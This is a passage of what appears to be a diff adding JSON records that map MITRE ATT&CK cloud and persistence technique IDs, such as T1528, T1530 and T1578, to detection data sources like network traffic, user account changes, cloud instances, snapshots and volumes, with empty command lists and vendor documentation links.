"data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1528", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1535", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ] + ] + }, + { + "technique_id": "T1525", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image modification", + "description": "An image was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "image" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ] + ] + }, + { + "technique_id": "T1538", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1530", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage access", + "description": "A cloud storage was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage access", + "description": "A cloud storage was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "cloud storage object" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1578", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "stopped", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance stop", + "description": "An instance was stopped.", + "source_data_element": "user", + "relationship": "powered off", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "attached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "detached", + "target_data_element": "disk/volume" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance modification", + "description": "An instance was modified.", + "source_data_element": "user", + "relationship": "updated", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "instance" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot creation", + "description": "A snapshot was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot modification", + "description": "A snapshot was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "snapshot" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot deletion", + "description": "A snapshot was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "snapshot" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume creation", + "description": "A volume was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "volume" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume modification", + "description": "A volume was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "volume" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume deletion", + "description": "A volume was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "volume" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1526", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service metadata", + "description": "Data and information that describe a cloud service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "cloud service" + }, + { + "data_source": "cloud service", + "definition": "Information about a service available within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "cloud service enumeration", + "description": "A cloud service was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "cloud service" + } + ], + "external_reference": [ + [ + "https://aws.amazon.com", + "https://azure.microsoft.com/en-us/services/" + ] + ] + }, + { + "technique_id": "T1505", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + 